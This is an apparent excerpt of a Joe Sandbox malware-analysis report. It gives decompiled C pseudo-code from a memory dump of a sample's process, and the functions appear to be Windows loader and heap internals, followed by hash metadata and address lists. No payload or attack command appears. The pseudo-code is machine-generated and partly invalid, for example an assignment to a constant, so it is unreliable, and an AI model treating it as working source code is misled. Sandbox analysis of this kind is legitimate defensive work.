                                                                                                            												__eflags = _t169;
                                                                                                            												if(_t169 != 0) {
                                                                                                            													 *0x1157b04 =  *0x1157b04 - _t169;
                                                                                                            												}
                                                                                                            											}
                                                                                                            											__eflags = _t193;
                                                                                                            											if(_t193 >= 0) {
                                                                                                            												 *((short*)( *((intOrPtr*)(_t237 - 0x5c)) + 0x3a)) = 0xffff;
                                                                                                            											}
                                                                                                            											goto L30;
                                                                                                            										}
                                                                                                            										_t226 = _t206 * 0xc;
                                                                                                            										__eflags = _t226;
                                                                                                            										_t194 =  *(_t237 - 0x48);
                                                                                                            										do {
                                                                                                            											 *(_t237 - 0x40) = _t206 - 1;
                                                                                                            											_t226 = _t226 - 0xc;
                                                                                                            											 *(_t237 - 0x4c) = _t226;
                                                                                                            											__eflags =  *(_t235 + _t226 + 0x10) & 0x00000002;
                                                                                                            											if(( *(_t235 + _t226 + 0x10) & 0x00000002) == 0) {
                                                                                                            												__eflags =  *(_t235 + _t226 + 0x10) & 0x00000001;
                                                                                                            												if(( *(_t235 + _t226 + 0x10) & 0x00000001) == 0) {
                                                                                                            													 *(_t237 - 0x68) =  *(_t237 - 0x68) + 1;
                                                                                                            													_t210 =  *(_t226 +  *(_t237 - 0x64) + 0x14);
                                                                                                            													__eflags =  *((char*)(_t237 - 0x39));
                                                                                                            													if( *((char*)(_t237 - 0x39)) == 0) {
                                                                                                            														_t171 = _t210;
                                                                                                            													} else {
                                                                                                            														 *(_t237 - 0x50) =  *(_t210 +  *(_t237 - 0x58) * 4);
                                                                                                            														L010877F0(_t194, _t236, _t210 - 8);
                                                                                                            														_t171 =  *(_t237 - 0x50);
                                                                                                            													}
                                                                                                            													L48:
                                                                                                            													L010877F0(_t194, _t236,  *((intOrPtr*)(_t171 - 4)));
                                                                                                            													L46:
                                                                                                            													_t206 =  *(_t237 - 0x40);
                                                                                                            													_t226 =  *(_t237 - 0x4c);
                                                                                                            													goto L24;
                                                                                                            												}
                                                                                                            												 *0x1157b08 =  *0x1157b08 + 1;
                                                                                                            												goto L24;
                                                                                                            											}
                                                                                                            											_t171 =  *(_t226 +  *(_t237 - 0x64) + 0x14);
                                                                                                            											__eflags = _t171;
                                                                                                            											if(_t171 != 0) {
                                                                                                            												__eflags =  *((char*)(_t237 - 0x39));
                                                                                                            												if( *((char*)(_t237 - 0x39)) == 0) {
                                                                                                            													goto L48;
                                                                                                            												}
                                                                                                            												E010A57C2(_t171,  *((intOrPtr*)(_t235 + _t226 + 0x18)));
                                                                                                            												goto L46;
                                                                                                            											}
                                                                                                            											L24:
                                                                                                            											__eflags = _t206;
                                                                                                            										} while (_t206 != 0);
                                                                                                            										_t193 =  *(_t237 - 0x44);
                                                                                                            										goto L26;
                                                                                                            									}
                                                                                                            									_t232 =  *(_t237 - 0x70) + 0x00000001 + _t214 &  !( *(_t237 - 0x70));
                                                                                                            									 *(_t237 - 0x7c) = _t232;
                                                                                                            									 *(_t232 - 4) = _t214;
                                                                                                            									 *(_t237 - 4) = _t236;
                                                                                                            									E010AF3E0(_t232,  *((intOrPtr*)( *((intOrPtr*)(_t237 - 0x74)) + 8)),  *((intOrPtr*)(_t237 - 0x54)));
                                                                                                            									_t238 = _t238 + 0xc;
                                                                                                            									 *(_t237 - 4) = 0xfffffffe;
                                                                                                            									_t215 =  *(_t237 - 0x48);
                                                                                                            									__eflags = _t193;
                                                                                                            									if(_t193 < 0) {
                                                                                                            										L010877F0(_t215, _t236,  *(_t237 - 0x78));
                                                                                                            										goto L20;
                                                                                                            									}
                                                                                                            									__eflags =  *((char*)(_t237 - 0x39));
                                                                                                            									if( *((char*)(_t237 - 0x39)) != 0) {
                                                                                                            										_t233 = E0109A44B( *(_t237 - 0x4c));
                                                                                                            										 *(_t237 - 0x50) = _t233;
                                                                                                            										__eflags = _t233;
                                                                                                            										if(_t233 == 0) {
                                                                                                            											L010877F0( *(_t237 - 0x48), _t236,  *(_t237 - 0x78));
                                                                                                            											goto L52;
                                                                                                            										}
                                                                                                            										 *(_t233 +  *(_t237 - 0x58) * 4) =  *(_t237 - 0x7c);
                                                                                                            										L17:
                                                                                                            										_t234 =  *(_t237 - 0x40);
                                                                                                            										_t218 = _t234 * 0xc;
                                                                                                            										 *(_t218 +  *(_t237 - 0x64) + 0x14) =  *(_t237 - 0x50);
                                                                                                            										 *(_t218 + _t235 + 0x10) = _t236;
                                                                                                            										_t224 = _t234 + 1;
                                                                                                            										 *(_t237 - 0x40) = _t224;
                                                                                                            										 *(_t237 - 0x50) = _t224;
                                                                                                            										_t193 =  *(_t237 - 0x44);
                                                                                                            										continue;
                                                                                                            									}
                                                                                                            									 *(_t237 - 0x50) =  *(_t237 - 0x7c);
                                                                                                            									goto L17;
                                                                                                            								}
                                                                                                            								 *_t235 = _t236;
                                                                                                            								_t165 = 0x10 + _t163 * 0xc;
                                                                                                            								__eflags = _t165;
                                                                                                            								_push(_t165);
                                                                                                            								_push(_t235);
                                                                                                            								_push(0x23);
                                                                                                            								_push(0xffffffff);
                                                                                                            								_t193 = E010A96C0();
                                                                                                            								goto L19;
                                                                                                            							} else {
                                                                                                            								goto L50;
                                                                                                            							}
                                                                                                            						}
                                                                                                            						_t235 = _t237 - 0x38;
                                                                                                            						 *(_t237 - 0x60) = _t235;
                                                                                                            						goto L8;
                                                                                                            					}
                                                                                                            					goto L4;
                                                                                                            				}
                                                                                                            			}


































                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.358500037.0000000001040000.00000040.00000800.00020000.00000000.sdmp, Offset: 01040000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_3_2_1040000_TT copy.jbxd
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            C-Code - Quality: 67%
                                                                                                            			E0109513A(intOrPtr __ecx, void* __edx) {
                                                                                                            				signed int _v8;
                                                                                                            				signed char _v16;
                                                                                                            				intOrPtr _v20;
                                                                                                            				intOrPtr _v24;
                                                                                                            				char _v28;
                                                                                                            				signed int _v32;
                                                                                                            				signed int _v36;
                                                                                                            				signed int _v40;
                                                                                                            				intOrPtr _v44;
                                                                                                            				intOrPtr _v48;
                                                                                                            				char _v63;
                                                                                                            				char _v64;
                                                                                                            				signed int _v72;
                                                                                                            				signed int _v76;
                                                                                                            				signed int _v80;
                                                                                                            				signed int _v84;
                                                                                                            				signed int _v88;
                                                                                                            				signed char* _v92;
                                                                                                            				signed int _v100;
                                                                                                            				signed int _v104;
                                                                                                            				char _v105;
                                                                                                            				void* __ebx;
                                                                                                            				void* __edi;
                                                                                                            				void* __esi;
                                                                                                            				void* _t157;
                                                                                                            				signed int _t159;
                                                                                                            				signed int _t160;
                                                                                                            				unsigned int* _t161;
                                                                                                            				intOrPtr _t165;
                                                                                                            				signed int _t172;
                                                                                                            				signed char* _t181;
                                                                                                            				intOrPtr _t189;
                                                                                                            				intOrPtr* _t200;
                                                                                                            				signed int _t202;
                                                                                                            				signed int _t203;
                                                                                                            				char _t204;
                                                                                                            				signed int _t207;
                                                                                                            				signed int _t208;
                                                                                                            				void* _t209;
                                                                                                            				intOrPtr _t210;
                                                                                                            				signed int _t212;
                                                                                                            				signed int _t214;
                                                                                                            				signed int _t221;
                                                                                                            				signed int _t222;
                                                                                                            				signed int _t226;
                                                                                                            				intOrPtr* _t232;
                                                                                                            				signed int _t233;
                                                                                                            				signed int _t234;
                                                                                                            				intOrPtr _t237;
                                                                                                            				intOrPtr _t238;
                                                                                                            				intOrPtr _t240;
                                                                                                            				void* _t245;
                                                                                                            				signed int _t246;
                                                                                                            				signed int _t247;
                                                                                                            				void* _t248;
                                                                                                            				void* _t251;
                                                                                                            				void* _t252;
                                                                                                            				signed int _t253;
                                                                                                            				signed int _t255;
                                                                                                            				signed int _t256;
                                                                                                            
                                                                                                            				_t255 = (_t253 & 0xfffffff8) - 0x6c;
                                                                                                            				_v8 =  *0x115d360 ^ _t255;
                                                                                                            				_v32 = _v32 & 0x00000000;
                                                                                                            				_t251 = __edx;
                                                                                                            				_t237 = __ecx;
                                                                                                            				_t212 = 6;
                                                                                                            				_t245 =  &_v84;
                                                                                                            				_t207 =  *((intOrPtr*)(__ecx + 0x48));
                                                                                                            				_v44 =  *((intOrPtr*)(__edx + 0xc8));
                                                                                                            				_v48 = __ecx;
                                                                                                            				_v36 = _t207;
                                                                                                            				_t157 = memset(_t245, 0, _t212 << 2);
                                                                                                            				_t256 = _t255 + 0xc;
                                                                                                            				_t246 = _t245 + _t212;
                                                                                                            				if(_t207 == 2) {
                                                                                                            					_t247 =  *(_t237 + 0x60);
                                                                                                            					_t208 =  *(_t237 + 0x64);
                                                                                                            					_v63 =  *((intOrPtr*)(_t237 + 0x4c));
                                                                                                            					_t159 =  *((intOrPtr*)(_t237 + 0x58));
                                                                                                            					_v104 = _t159;
                                                                                                            					_v76 = _t159;
                                                                                                            					_t160 =  *((intOrPtr*)(_t237 + 0x5c));
                                                                                                            					_v100 = _t160;
                                                                                                            					_v72 = _t160;
                                                                                                            					L19:
                                                                                                            					_v80 = _t208;
                                                                                                            					_v84 = _t247;
                                                                                                            					L8:
                                                                                                            					_t214 = 0;
                                                                                                            					if( *(_t237 + 0x74) > 0) {
                                                                                                            						_t82 = _t237 + 0x84; // 0x124
                                                                                                            						_t161 = _t82;
                                                                                                            						_v92 = _t161;
                                                                                                            						while( *_t161 >> 0x1f != 0) {
                                                                                                            							_t200 = _v92;
                                                                                                            							if( *_t200 == 0x80000000) {
                                                                                                            								break;
                                                                                                            							}
                                                                                                            							_t214 = _t214 + 1;
                                                                                                            							_t161 = _t200 + 0x10;
                                                                                                            							_v92 = _t161;
                                                                                                            							if(_t214 <  *(_t237 + 0x74)) {
                                                                                                            								continue;
                                                                                                            							}
                                                                                                            							goto L9;
                                                                                                            						}
                                                                                                            						_v88 = _t214 << 4;
                                                                                                            						_v40 = _t237 +  *((intOrPtr*)(_v88 + _t237 + 0x78));
                                                                                                            						_t165 = 0;
                                                                                                            						asm("adc eax, [ecx+edx+0x7c]");
                                                                                                            						_v24 = _t165;
                                                                                                            						_v28 = _v40;
                                                                                                            						_v20 =  *((intOrPtr*)(_v88 + _t237 + 0x80));
                                                                                                            						_t221 = _v40;
                                                                                                            						_v16 =  *_v92;
                                                                                                            						_v32 =  &_v28;
                                                                                                            						if( *(_t237 + 0x4e) >> 0xf == 0) {
                                                                                                            							goto L9;
                                                                                                            						}
                                                                                                            						_t240 = _v48;
                                                                                                            						if( *_v92 != 0x80000000) {
                                                                                                            							goto L9;
                                                                                                            						}
                                                                                                            						 *((intOrPtr*)(_t221 + 8)) = 0;
                                                                                                            						 *((intOrPtr*)(_t221 + 0xc)) = 0;
                                                                                                            						 *((intOrPtr*)(_t221 + 0x14)) = 0;
                                                                                                            						 *((intOrPtr*)(_t221 + 0x10)) = _v20;
                                                                                                            						_t226 = 0;
                                                                                                            						_t181 = _t251 + 0x66;
                                                                                                            						_v88 = 0;
                                                                                                            						_v92 = _t181;
                                                                                                            						do {
                                                                                                            							if( *((char*)(_t181 - 2)) == 0) {
                                                                                                            								goto L31;
                                                                                                            							}
                                                                                                            							_t226 = _v88;
                                                                                                            							if(( *_t181 & 0x000000ff) == ( *(_t240 + 0x4e) & 0x7fff)) {
                                                                                                            								_t181 = E010AD0F0(1, _t226 + 0x20, 0);
                                                                                                            								_t226 = _v40;
                                                                                                            								 *(_t226 + 8) = _t181;
                                                                                                            								 *((intOrPtr*)(_t226 + 0xc)) = 0;
                                                                                                            								L34:
                                                                                                            								if(_v44 == 0) {
                                                                                                            									goto L9;
                                                                                                            								}
                                                                                                            								_t210 = _v44;
                                                                                                            								_t127 = _t210 + 0x1c; // 0x1c
                                                                                                            								_t249 = _t127;
                                                                                                            								E01082280(_t181, _t127);
                                                                                                            								 *(_t210 + 0x20) =  *( *[fs:0x18] + 0x24);
                                                                                                            								_t185 =  *((intOrPtr*)(_t210 + 0x94));
                                                                                                            								if( *((intOrPtr*)(_t210 + 0x94)) != 0) {
                                                                                                            									L010877F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t185);
                                                                                                            								}
                                                                                                            								_t189 = L01084620(_t226,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _v20 + 0x10);
                                                                                                            								 *((intOrPtr*)(_t210 + 0x94)) = _t189;
                                                                                                            								if(_t189 != 0) {
                                                                                                            									 *((intOrPtr*)(_t189 + 8)) = _v20;
                                                                                                            									 *( *((intOrPtr*)(_t210 + 0x94)) + 0xc) = _v16;
                                                                                                            									_t232 =  *((intOrPtr*)(_t210 + 0x94));
                                                                                                            									 *_t232 = _t232 + 0x10;
                                                                                                            									 *(_t232 + 4) =  *(_t232 + 4) & 0x00000000;
                                                                                                            									E010AF3E0( *((intOrPtr*)( *((intOrPtr*)(_t210 + 0x94)))), _v28, _v20);
                                                                                                            									_t256 = _t256 + 0xc;
                                                                                                            								}
                                                                                                            								 *(_t210 + 0x20) =  *(_t210 + 0x20) & 0x00000000;
                                                                                                            								E0107FFB0(_t210, _t249, _t249);
                                                                                                            								_t222 = _v76;
                                                                                                            								_t172 = _v80;
                                                                                                            								_t208 = _v84;
                                                                                                            								_t247 = _v88;
                                                                                                            								L10:
                                                                                                            								_t238 =  *((intOrPtr*)(_t251 + 0x1c));
                                                                                                            								_v44 = _t238;
                                                                                                            								if(_t238 != 0) {
                                                                                                            									 *0x115b1e0(_v48 + 0x38, _v36, _v63, _t172, _t222, _t247, _t208, _v32,  *((intOrPtr*)(_t251 + 0x20)));
                                                                                                            									_v44();
                                                                                                            								}
                                                                                                            								_pop(_t248);
                                                                                                            								_pop(_t252);
                                                                                                            								_pop(_t209);
                                                                                                            								return E010AB640(0, _t209, _v8 ^ _t256, _t238, _t248, _t252);
                                                                                                            							}
                                                                                                            							_t181 = _v92;
                                                                                                            							L31:
                                                                                                            							_t226 = _t226 + 1;
                                                                                                            							_t181 =  &(_t181[0x18]);
                                                                                                            							_v88 = _t226;
                                                                                                            							_v92 = _t181;
                                                                                                            						} while (_t226 < 4);
                                                                                                            						goto L34;
                                                                                                            					}
                                                                                                            					L9:
                                                                                                            					_t172 = _v104;
                                                                                                            					_t222 = _v100;
                                                                                                            					goto L10;
                                                                                                            				}
                                                                                                            				_t247 = _t246 | 0xffffffff;
                                                                                                            				_t208 = _t247;
                                                                                                            				_v84 = _t247;
                                                                                                            				_v80 = _t208;
                                                                                                            				if( *((intOrPtr*)(_t251 + 0x4c)) == _t157) {
                                                                                                            					_t233 = _v72;
                                                                                                            					_v105 = _v64;
                                                                                                            					_t202 = _v76;
                                                                                                            				} else {
                                                                                                            					_t204 =  *((intOrPtr*)(_t251 + 0x4d));
                                                                                                            					_v105 = 1;
                                                                                                            					if(_v63 <= _t204) {
                                                                                                            						_v63 = _t204;
                                                                                                            					}
                                                                                                            					_t202 = _v76 |  *(_t251 + 0x40);
                                                                                                            					_t233 = _v72 |  *(_t251 + 0x44);
                                                                                                            					_t247 =  *(_t251 + 0x38);
                                                                                                            					_t208 =  *(_t251 + 0x3c);
                                                                                                            					_v76 = _t202;
                                                                                                            					_v72 = _t233;
                                                                                                            					_v84 = _t247;
                                                                                                            					_v80 = _t208;
                                                                                                            				}
                                                                                                            				_v104 = _t202;
                                                                                                            				_v100 = _t233;
                                                                                                            				if( *((char*)(_t251 + 0xc4)) != 0) {
                                                                                                            					_t237 = _v48;
                                                                                                            					_v105 = 1;
                                                                                                            					if(_v63 <=  *((intOrPtr*)(_t251 + 0xc5))) {
                                                                                                            						_v63 =  *((intOrPtr*)(_t251 + 0xc5));
                                                                                                            						_t237 = _v48;
                                                                                                            					}
                                                                                                            					_t203 = _t202 |  *(_t251 + 0xb8);
                                                                                                            					_t234 = _t233 |  *(_t251 + 0xbc);
                                                                                                            					_t247 = _t247 &  *(_t251 + 0xb0);
                                                                                                            					_t208 = _t208 &  *(_t251 + 0xb4);
                                                                                                            					_v104 = _t203;
                                                                                                            					_v76 = _t203;
                                                                                                            					_v100 = _t234;
                                                                                                            					_v72 = _t234;
                                                                                                            					_v84 = _t247;
                                                                                                            					_v80 = _t208;
                                                                                                            				}
                                                                                                            				if(_v105 == 0) {
                                                                                                            					_v36 = _v36 & 0x00000000;
                                                                                                            					_t208 = 0;
                                                                                                            					_t247 = 0;
                                                                                                            					 *(_t237 + 0x74) =  *(_t237 + 0x74) & 0;
                                                                                                            					goto L19;
                                                                                                            				} else {
                                                                                                            					_v36 = 1;
                                                                                                            					goto L8;
                                                                                                            				}
                                                                                                            			}

                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.358500037.0000000001040000.00000040.00000800.00020000.00000000.sdmp, Offset: 01040000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_3_2_1040000_TT copy.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 8f3590119f73b05ea6bf7beefada37ca0667c3b6efc28f33853b51a0f8037d79
                                                                                                            • Instruction ID: e4984ad7abdceece4cb55a775a89158135823e097fbb0af95f3bf574ee3aab09
                                                                                                            • Opcode Fuzzy Hash: 8f3590119f73b05ea6bf7beefada37ca0667c3b6efc28f33853b51a0f8037d79
                                                                                                            • Instruction Fuzzy Hash: 2FC121755083818FD755CF28C480A6AFBE1BF89304F184AAEF9D98B352D771E885CB42
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            C-Code - Quality: 74%
                                                                                                            			E010903E2(signed int __ecx, signed int __edx) {
                                                                                                            				signed int _v8;
                                                                                                            				signed int _v12;
                                                                                                            				signed int _v16;
                                                                                                            				signed int _v20;
                                                                                                            				signed int _v24;
                                                                                                            				signed int _v28;
                                                                                                            				signed int _v32;
                                                                                                            				signed int _v36;
                                                                                                            				intOrPtr _v40;
                                                                                                            				signed int _v44;
                                                                                                            				signed int _v48;
                                                                                                            				char _v52;
                                                                                                            				char _v56;
                                                                                                            				char _v64;
                                                                                                            				void* __ebx;
                                                                                                            				void* __edi;
                                                                                                            				void* __esi;
                                                                                                            				signed int _t56;
                                                                                                            				signed int _t58;
                                                                                                            				char* _t64;
                                                                                                            				intOrPtr _t65;
                                                                                                            				signed int _t74;
                                                                                                            				signed int _t79;
                                                                                                            				char* _t83;
                                                                                                            				intOrPtr _t84;
                                                                                                            				signed int _t93;
                                                                                                            				signed int _t94;
                                                                                                            				signed char* _t95;
                                                                                                            				signed int _t99;
                                                                                                            				signed int _t100;
                                                                                                            				signed char* _t101;
                                                                                                            				signed int _t105;
                                                                                                            				signed int _t119;
                                                                                                            				signed int _t120;
                                                                                                            				void* _t122;
                                                                                                            				signed int _t123;
                                                                                                            				signed int _t127;
                                                                                                            
                                                                                                            				_v8 =  *0x115d360 ^ _t127;
                                                                                                            				_t119 = __ecx;
                                                                                                            				_t105 = __edx;
                                                                                                            				_t118 = 0;
                                                                                                            				_v20 = __edx;
                                                                                                            				_t120 =  *(__ecx + 0x20);
                                                                                                            				if(E01090548(__ecx, 0) != 0) {
                                                                                                            					_t56 = 0xc000022d;
                                                                                                            					L23:
                                                                                                            					return E010AB640(_t56, _t105, _v8 ^ _t127, _t118, _t119, _t120);
                                                                                                            				} else {
                                                                                                            					_v12 = _v12 | 0xffffffff;
                                                                                                            					_t58 = _t120 + 0x24;
                                                                                                            					_t109 =  *(_t120 + 0x18);
                                                                                                            					_t118 = _t58;
                                                                                                            					_v16 = _t58;
                                                                                                            					E0107B02A( *(_t120 + 0x18), _t118, 0x14a5);
                                                                                                            					_v52 = 0x18;
                                                                                                            					_v48 = 0;
                                                                                                            					0x840 = 0x40;
                                                                                                            					if( *0x1157c1c != 0) {
                                                                                                            					}
                                                                                                            					_v40 = 0x840;
                                                                                                            					_v44 = _t105;
                                                                                                            					_v36 = 0;
                                                                                                            					_v32 = 0;
                                                                                                            					if(E01087D50() != 0) {
                                                                                                            						_t64 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
                                                                                                            					} else {
                                                                                                            						_t64 = 0x7ffe0384;
                                                                                                            					}
                                                                                                            					if( *_t64 != 0) {
                                                                                                            						_t65 =  *[fs:0x30];
                                                                                                            						__eflags =  *(_t65 + 0x240) & 0x00000004;
                                                                                                            						if(( *(_t65 + 0x240) & 0x00000004) != 0) {
                                                                                                            							_t100 = E01087D50();
                                                                                                            							__eflags = _t100;
                                                                                                            							if(_t100 == 0) {
                                                                                                            								_t101 = 0x7ffe0385;
                                                                                                            							} else {
                                                                                                            								_t101 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22b;
                                                                                                            							}
                                                                                                            							__eflags =  *_t101 & 0x00000020;
                                                                                                            							if(( *_t101 & 0x00000020) != 0) {
                                                                                                            								_t118 = _t118 | 0xffffffff;
                                                                                                            								_t109 = 0x1485;
                                                                                                            								E010E7016(0x1485, _t118, 0xffffffff, 0xffffffff, 0, 0);
                                                                                                            							}
                                                                                                            						}
                                                                                                            					}
                                                                                                            					_t105 = 0;
                                                                                                            					while(1) {
                                                                                                            						_push(0x60);
                                                                                                            						_push(5);
                                                                                                            						_push( &_v64);
                                                                                                            						_push( &_v52);
                                                                                                            						_push(0x100021);
                                                                                                            						_push( &_v12);
                                                                                                            						_t122 = E010A9830();
                                                                                                            						if(_t122 >= 0) {
                                                                                                            							break;
                                                                                                            						}
                                                                                                            						__eflags = _t122 - 0xc0000034;
                                                                                                            						if(_t122 == 0xc0000034) {
                                                                                                            							L38:
                                                                                                            							_t120 = 0xc0000135;
                                                                                                            							break;
                                                                                                            						}
                                                                                                            						__eflags = _t122 - 0xc000003a;
                                                                                                            						if(_t122 == 0xc000003a) {
                                                                                                            							goto L38;
                                                                                                            						}
                                                                                                            						__eflags = _t122 - 0xc0000022;
                                                                                                            						if(_t122 != 0xc0000022) {
                                                                                                            							break;
                                                                                                            						}
                                                                                                            						__eflags = _t105;
                                                                                                            						if(__eflags != 0) {
                                                                                                            							break;
                                                                                                            						}
                                                                                                            						_t109 = _t119;
                                                                                                            						_t99 = E010E69A6(_t119, __eflags);
                                                                                                            						__eflags = _t99;
                                                                                                            						if(_t99 == 0) {
                                                                                                            							break;
                                                                                                            						}
                                                                                                            						_t105 = _t105 + 1;
                                                                                                            					}
                                                                                                            					if( !_t120 >= 0) {
                                                                                                            						L22:
                                                                                                            						_t56 = _t120;
                                                                                                            						goto L23;
                                                                                                            					}
                                                                                                            					if( *0x1157c04 != 0) {
                                                                                                            						_t118 = _v12;
                                                                                                            						_t120 = E010EA7AC(_t119, _t118, _t109);
                                                                                                            						__eflags = _t120;
                                                                                                            						if(_t120 >= 0) {
                                                                                                            							goto L10;
                                                                                                            						}
                                                                                                            						__eflags =  *0x1157bd8;
                                                                                                            						if( *0x1157bd8 != 0) {
                                                                                                            							L20:
                                                                                                            							if(_v12 != 0xffffffff) {
                                                                                                            								_push(_v12);
                                                                                                            								E010A95D0();
                                                                                                            							}
                                                                                                            							goto L22;
                                                                                                            						}
                                                                                                            					}
                                                                                                            					L10:
                                                                                                            					_push(_v12);
                                                                                                            					_t105 = _t119 + 0xc;
                                                                                                            					_push(0x1000000);
                                                                                                            					_push(0x10);
                                                                                                            					_push(0);
                                                                                                            					_push(0);
                                                                                                            					_push(0xf);
                                                                                                            					_push(_t105);
                                                                                                            					_t120 = E010A99A0();
                                                                                                            					if(_t120 < 0) {
                                                                                                            						__eflags = _t120 - 0xc000047e;
                                                                                                            						if(_t120 == 0xc000047e) {
                                                                                                            							L51:
                                                                                                            							_t74 = E010E3540(_t120);
                                                                                                            							_t119 = _v16;
                                                                                                            							_t120 = _t74;
                                                                                                            							L52:
                                                                                                            							_t118 = 0x1485;
                                                                                                            							E0106B1E1(_t120, 0x1485, 0, _t119);
                                                                                                            							goto L20;
                                                                                                            						}
                                                                                                            						__eflags = _t120 - 0xc000047f;
                                                                                                            						if(_t120 == 0xc000047f) {
                                                                                                            							goto L51;
                                                                                                            						}
                                                                                                            						__eflags = _t120 - 0xc0000462;
                                                                                                            						if(_t120 == 0xc0000462) {
                                                                                                            							goto L51;
                                                                                                            						}
                                                                                                            						_t119 = _v16;
                                                                                                            						__eflags = _t120 - 0xc0000017;
                                                                                                            						if(_t120 != 0xc0000017) {
                                                                                                            							__eflags = _t120 - 0xc000009a;
                                                                                                            							if(_t120 != 0xc000009a) {
                                                                                                            								__eflags = _t120 - 0xc000012d;
                                                                                                            								if(_t120 != 0xc000012d) {
                                                                                                            									_v28 = _t119;
                                                                                                            									_push( &_v56);
                                                                                                            									_push(1);
                                                                                                            									_v24 = _t120;
                                                                                                            									_push( &_v28);
                                                                                                            									_push(1);
                                                                                                            									_push(2);
                                                                                                            									_push(0xc000007b);
                                                                                                            									_t79 = E010AAAF0();
                                                                                                            									__eflags = _t79;
                                                                                                            									if(_t79 >= 0) {
                                                                                                            										__eflags =  *0x1158474 - 3;
                                                                                                            										if( *0x1158474 != 3) {
                                                                                                            											 *0x11579dc =  *0x11579dc + 1;
                                                                                                            										}
                                                                                                            									}
                                                                                                            								}
                                                                                                            							}
                                                                                                            						}
                                                                                                            						goto L52;
                                                                                                            					}
                                                                                                            					if(E01087D50() != 0) {
                                                                                                            						_t83 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
                                                                                                            					} else {
                                                                                                            						_t83 = 0x7ffe0384;
                                                                                                            					}
                                                                                                            					if( *_t83 != 0) {
                                                                                                            						_t84 =  *[fs:0x30];
                                                                                                            						__eflags =  *(_t84 + 0x240) & 0x00000004;
                                                                                                            						if(( *(_t84 + 0x240) & 0x00000004) != 0) {
                                                                                                            							_t94 = E01087D50();
                                                                                                            							__eflags = _t94;
                                                                                                            							if(_t94 == 0) {
                                                                                                            								_t95 = 0x7ffe0385;
                                                                                                            							} else {
                                                                                                            								_t95 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22b;
                                                                                                            							}
                                                                                                            							__eflags =  *_t95 & 0x00000020;
                                                                                                            							if(( *_t95 & 0x00000020) != 0) {
                                                                                                            								E010E7016(0x1486, _t118, 0xffffffff, 0xffffffff, 0, 0);
                                                                                                            							}
                                                                                                            						}
                                                                                                            					}
                                                                                                            					if(( *(_t119 + 0x10) & 0x00000100) == 0) {
                                                                                                            						if( *0x1158708 != 0) {
                                                                                                            							_t118 =  *0x7ffe0330;
                                                                                                            							_t123 =  *0x1157b00; // 0x0
                                                                                                            							asm("ror esi, cl");
                                                                                                            							 *0x115b1e0(_v12, _v20, 0x20);
                                                                                                            							_t93 =  *(_t123 ^  *0x7ffe0330)();
                                                                                                            							_t50 = _t93 + 0x3ffffddb; // 0x3ffffddb
                                                                                                            							asm("sbb esi, esi");
                                                                                                            							_t120 =  ~_t50 & _t93;
                                                                                                            						} else {
                                                                                                            							_t120 = 0;
                                                                                                            						}
                                                                                                            					}
                                                                                                            					if( !_t120 >= 0) {
                                                                                                            						L19:
                                                                                                            						_push( *_t105);
                                                                                                            						E010A95D0();
                                                                                                            						 *_t105 =  *_t105 & 0x00000000;
                                                                                                            						goto L20;
                                                                                                            					}
                                                                                                            					_t120 = E01077F65(_t119);
                                                                                                            					if( *((intOrPtr*)(_t119 + 0x60)) != 0) {
                                                                                                            						__eflags = _t120;
                                                                                                            						if(_t120 < 0) {
                                                                                                            							goto L19;
                                                                                                            						}
                                                                                                            						 *(_t119 + 0x64) = _v12;
                                                                                                            						goto L22;
                                                                                                            					}
                                                                                                            					goto L19;
                                                                                                            				}
                                                                                                            			}








































                                                                                                            0x010d4caa
                                                                                                            0x010d4caf
                                                                                                            0x010d4cb1
                                                                                                            0x010d4cc3
                                                                                                            0x010d4cb3
                                                                                                            0x010d4cbc
                                                                                                            0x010d4cbc
                                                                                                            0x010d4cc8
                                                                                                            0x010d4ccb
                                                                                                            0x010d4cd7
                                                                                                            0x010d4cda
                                                                                                            0x010d4cdf
                                                                                                            0x010d4cdf
                                                                                                            0x010d4ccb
                                                                                                            0x010d4ca4
                                                                                                            0x0109046d
                                                                                                            0x0109046f
                                                                                                            0x0109046f
                                                                                                            0x01090471
                                                                                                            0x01090476
                                                                                                            0x0109047a
                                                                                                            0x0109047b
                                                                                                            0x01090483
                                                                                                            0x01090489
                                                                                                            0x0109048d
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x010d4ce9
                                                                                                            0x010d4cef
                                                                                                            0x010d4d22
                                                                                                            0x010d4d22
                                                                                                            0x00000000
                                                                                                            0x010d4d22
                                                                                                            0x010d4cf1
                                                                                                            0x010d4cf7
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x010d4cf9
                                                                                                            0x010d4cff
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x010d4d05
                                                                                                            0x010d4d07
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x010d4d0d
                                                                                                            0x010d4d0f
                                                                                                            0x010d4d14
                                                                                                            0x010d4d16
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x010d4d1c
                                                                                                            0x010d4d1c
                                                                                                            0x01090499
                                                                                                            0x01090535
                                                                                                            0x01090535
                                                                                                            0x00000000
                                                                                                            0x01090535
                                                                                                            0x010904a6
                                                                                                            0x010d4d2c
                                                                                                            0x010d4d37
                                                                                                            0x010d4d39
                                                                                                            0x010d4d3b
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x010d4d41
                                                                                                            0x010d4d48
                                                                                                            0x01090527
                                                                                                            0x0109052b
                                                                                                            0x0109052d
                                                                                                            0x01090530
                                                                                                            0x01090530
                                                                                                            0x00000000
                                                                                                            0x0109052b
                                                                                                            0x010d4d4e
                                                                                                            0x010904ac
                                                                                                            0x010904ac
